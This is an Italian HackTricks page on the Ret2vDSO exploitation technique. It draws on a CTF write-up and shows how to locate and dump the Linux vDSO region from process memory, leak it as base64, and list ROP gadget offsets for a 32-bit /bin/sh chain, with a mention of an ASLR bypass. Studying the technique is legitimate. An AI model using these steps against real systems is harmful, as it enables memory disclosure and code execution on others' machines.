Ret2vDSO

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Informazioni di base

Potrebbero esserci gadgets in the vDSO region, che è un piccolo ELF DSO mappato dal kernel per fornire implementazioni user-space veloci di alcuni kernel helpers. In questo tipo di challenges, di solito viene fornita un’immagine del kernel per dumpare la vDSO region.

Individuare la base del vDSO e le esportazioni

L’indirizzo base del vDSO viene passato nell’auxiliary vector come AT_SYSINFO_EHDR, quindi se puoi leggere /proc/<pid>/auxv (o chiamare getauxval in un processo helper), puoi recuperare la base senza affidarti a una memory leak. Vedi Auxiliary Vector (auxv) and vDSO per modi pratici per ottenerla.

Una volta ottenuta la base, tratta il vDSO come un normale ELF DSO (linux-vdso.so.1): dumpa il mapping e usa readelf -Ws/objdump -d (o il parser di riferimento del kernel tools/testing/selftests/vDSO/parse_vdso.c) per risolvere i simboli esportati e cercare gadgets. Su x86 32-bit il vDSO esporta comunemente __kernel_vsyscall, __kernel_sigreturn, e __kernel_rt_sigreturn; su x86_64 gli export tipici includono __vdso_clock_gettime, __vdso_gettimeofday, e __vdso_time. Poiché il vDSO usa symbol versioning, abbina la versione attesa quando risolvi i simboli.

Following the example from https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/ it’s possible to see how it was possible to dump the vdso section and move it to the host with:

# Find addresses
cat /proc/76/maps
08048000-08049000 r--p 00000000 00:02 317                                /target
08049000-0804a000 r-xp 00001000 00:02 317                                /target
0804a000-0804b000 rw-p 00002000 00:02 317                                /target
f7ff8000-f7ffc000 r--p 00000000 00:00 0                                  [vvar]
f7ffc000-f7ffe000 r-xp 00000000 00:00 0                                  [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack]

# Dump it
dd if=/proc/76/mem of=vdso bs=1 skip=$((0xf7ffc000)) count=$((0x2000))
8192+0 records in
8192+0 records out
8192 bytes (8.0KB) copied, 0.901154 seconds, 8.9KB/s

# Compress and leak it
gzip vdso
base64 vdso.gz

# Decompress and check of gadgets
echo '<base64-payload>' | base64 -d | gzip -d - > vdso
file vdso
ROPgadget --binary vdso | grep 'int 0x80'

ROP gadgets trovati:

vdso_addr = 0xf7ffc000

int_0x80_xor_eax_eax_ret_addr = 0x8049010
bin_sh_addr = 0x804a800

# 0x0000057a : pop edx ; pop ecx ; ret
pop_edx_pop_ecx_ret_addr = vdso_addr + 0x57a

# 0x00000cca : mov dword ptr [edx], ecx ; add esp, 0x34 ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
mov_dword_ptr_edx_ecx_ret_addr = vdso_addr + 0xcca

# 0x00000ccb : or al, byte ptr [ebx + 0x5e5b34c4] ; pop edi ; pop ebp ; ret
or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb

# 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret
pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd

Caution

Nota quindi come potrebbe essere possibile bypassare ASLR abusando del vdso se il kernel è compilato con CONFIG_COMPAT_VDSO poiché l’indirizzo del vdso non verrà randomizzato: https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639

ARM64

Dopo aver dumpato e controllato la sezione vdso di un binario in kali 2023.2 arm64, non sono riuscito a trovare alcun gadget interessante (nessun modo per controllare i registri con valori nello stack o per controllare x30 per un ret) eccetto un modo per chiamare una SROP. Controlla più info nell’esempio della pagina:

SROP - arm64

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks